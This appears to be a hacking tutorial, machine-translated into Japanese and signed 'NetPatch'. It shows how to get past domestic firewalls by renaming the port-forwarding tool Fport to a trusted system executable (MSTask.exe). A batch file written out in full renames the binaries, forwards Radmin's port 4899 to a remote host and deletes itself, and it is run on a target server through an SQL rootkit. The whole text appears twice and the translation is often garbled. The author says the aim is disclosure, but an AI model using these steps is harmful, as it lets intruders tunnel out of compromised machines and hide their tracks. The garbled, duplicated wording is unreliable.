国内のいくつかのファイアウォールの技術を殺します。
今まで一つの夢がありました。私は穴やバグを見つけられたらいいですね。一日中パソコンに向かって研究をしています。何を研究していますか?どのようにファイアウォールを突破するかを研究します。へへへ、あなたはまだ言わないで、まだ本当に研究するだけではなくて、また本当に私に大多数のファイアウォールの通病を発見しました。このバグは防火壁を騙して外遊の目的を達成することができます。具体的にはどのような状況ですか?次の解説を見てください。
まず、Windowsシステムの特性を紹介します。プログラムが実行されると、削除できないですが、改名できます。そして、システム内の保護されたプログラムが削除されたり、破損されたり、改名されたりすると、システムはすぐにバックアップファイルを呼び出して元に戻すことができます。ファイアウォールについて説明します。みんなが知っています。ファイアウォールの「アプリケーションルール」の中ではデフォルトでIEブラウザ、Outlookが使えます。 Express(msimn.exe)、lsass.exe、spoolsv.exe、MSTask.exe、win logon.exe、services.exe、svchost.exeは通過して、大部分のファイアウォールは規則の中のパスとファイル名と同じであればPassと考えています。このような検査方法で行を通すかどうかを決定しましたが、他のファイルが入れ替わるとは全く考えられませんでした。時代劇の中の易容術に相当して、易容後は見分けられません!これは私達に機会を与えました。このバグを利用して防火壁を騙して外遊の目的を達成できます。
小さい知識:実は現在多くの木馬が採用しているDLLスレッド技術はこの原理を利用しています。彼らはまず隠して認証が行われたプログラムプロセス(例えばIexplore.exeプロセス)を開いて、DLL型木馬をこのスレッド内に挿入します。そして外を訪問する時には、簡単に防火壁の制限を突破することができます。
原理は終わって、私達は今どのようにこのBUGを利用するべきですか?ここでは仮想マシンを使って実験をします。次の条件を作ります。
より現実に合うように、私はサーバーに「天網防火壁」、Radminを設置しました。MSSQL SERVER、Serv-u。まず、私たちはよく使う方法でポート転送を行います。ファイアウォールの反応を見てみます。
最初のステップは、アンジェラシェルを有効にします。 Ver. 1.0里のFport(ポート転送を行うためのサービス端末は、ほとんど任意のポートに転送できます。)をローカルでFport Client(ポート転送を行うためのクライアント)で傍受してください。
第二ステップは、直接CMDSHELLで実行します。 4899 192.168.1.1 7788」この時、私たちは仮想マシンの「天網」を見て、すぐにFportをブロックしました。
見ましたよねFportは認証が行われていないので、ファイアウォールはすぐにブロックされました。OKです。今は騙し計画を実行します。どうやって防火壁を突破しますか?それとも最初のステップを実行して、新しいバッチを作成します。内容は以下の通りです。
ren MSTask.exe MSTask 1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del %0
go.batと名付けて、Sql RootKitで「Fport.exe」とgo.batを使います。 ターゲットマシンにcopyを一緒にするc:\wint\system 32\(つまりMSTaskがあるディレクトリ)はSql RootKitでgo.batを実行します。
Fport Cientが現れたら「リモートコンピュータに接続されました!」本機の4899ポートをRadminクライアントで接続します。
私達はすでに制限を突破しました。(ファイアウォールにローカル接続4899ポートが制限されていませんので、Fportでポートを転送しました。ログイン時はローカル接続に等しいので、成功的に接続できます。)こうすれば、ファイアウォールを逃れられないFportはプラグイン技術のあるポート転送ツールになります。
私の実験によると、国内のファイアウォールはほとんど例外なく「持っている」このバグがあります。このバグは大きな被害をもたらしませんが、常に侵入者にブラックの機会を与えます。
WTRFの総領は独楽は大衆の楽に及ばないと言って、だから私はやはり公表してきました。一つは国内のファイアウォールをある程度改善させて、もう一つはネット管理者達に目が覚めます。小弟の技術は限られていますので、間違いがあります。皆様のご叱正を歓迎します。
N/P (NetPatch)
まず、Windowsシステムの特性を紹介します。プログラムが実行されると、削除できないですが、改名できます。そして、システム内の保護されたプログラムが削除されたり、破損されたり、改名されたりすると、システムはすぐにバックアップファイルを呼び出して元に戻すことができます。ファイアウォールについて説明します。みんなが知っています。ファイアウォールの「アプリケーションルール」の中ではデフォルトでIEブラウザ、Outlookが使えます。 Express(msimn.exe)、lsass.exe、spoolsv.exe、MSTask.exe、win logon.exe、services.exe、svchost.exeは通過して、大部分のファイアウォールは規則の中のパスとファイル名と同じであればPassと考えています。このような検査方法で行を通すかどうかを決定しましたが、他のファイルが入れ替わるとは全く考えられませんでした。時代劇の中の易容術に相当して、易容後は見分けられません!これは私達に機会を与えました。このバグを利用して防火壁を騙して外遊の目的を達成できます。
小さい知識:実は現在多くの木馬が採用しているDLLスレッド技術はこの原理を利用しています。彼らはまず隠して認証が行われたプログラムプロセス(例えばIexplore.exeプロセス)を開いて、DLL型木馬をこのスレッド内に挿入します。そして外を訪問する時には、簡単に防火壁の制限を突破することができます。
原理は終わって、私達は今どのようにこのBUGを利用するべきですか?ここでは仮想マシンを使って実験をします。次の条件を作ります。
より現実に合うように、私はサーバーに「天網防火壁」、Radminを設置しました。MSSQL SERVER、Serv-u。まず、私たちはよく使う方法でポート転送を行います。ファイアウォールの反応を見てみます。
最初のステップは、アンジェラシェルを有効にします。 Ver. 1.0里のFport(ポート転送を行うためのサービス端末は、ほとんど任意のポートに転送できます。)をローカルでFport Client(ポート転送を行うためのクライアント)で傍受してください。
第二ステップは、直接CMDSHELLで実行します。 4899 192.168.1.1 7788」この時、私たちは仮想マシンの「天網」を見て、すぐにFportをブロックしました。
見ましたよねFportは認証が行われていないので、ファイアウォールはすぐにブロックされました。OKです。今は騙し計画を実行します。どうやって防火壁を突破しますか?それとも最初のステップを実行して、新しいバッチを作成します。内容は以下の通りです。
ren MSTask.exe MSTask 1.exe
ren fport.exe MSTask.exe
MSTask.exe 4899 192.168.1.1 7788
Del %0
go.batと名付けて、Sql RootKitで「Fport.exe」とgo.batを使います。 ターゲットマシンにcopyを一緒にするc:\wint\system 32\(つまりMSTaskがあるディレクトリ)はSql RootKitでgo.batを実行します。
Fport Cientが現れたら「リモートコンピュータに接続されました!」本機の4899ポートをRadminクライアントで接続します。
私達はすでに制限を突破しました。(ファイアウォールにローカル接続4899ポートが制限されていませんので、Fportでポートを転送しました。ログイン時はローカル接続に等しいので、成功的に接続できます。)こうすれば、ファイアウォールを逃れられないFportはプラグイン技術のあるポート転送ツールになります。
私の実験によると、国内のファイアウォールはほとんど例外なく「持っている」このバグがあります。このバグは大きな被害をもたらしませんが、常に侵入者にブラックの機会を与えます。
WTRFの総領は独楽は大衆の楽に及ばないと言って、だから私はやはり公表してきました。一つは国内のファイアウォールをある程度改善させて、もう一つはネット管理者達に目が覚めます。小弟の技術は限られていますので、間違いがあります。皆様のご叱正を歓迎します。
N/P (NetPatch)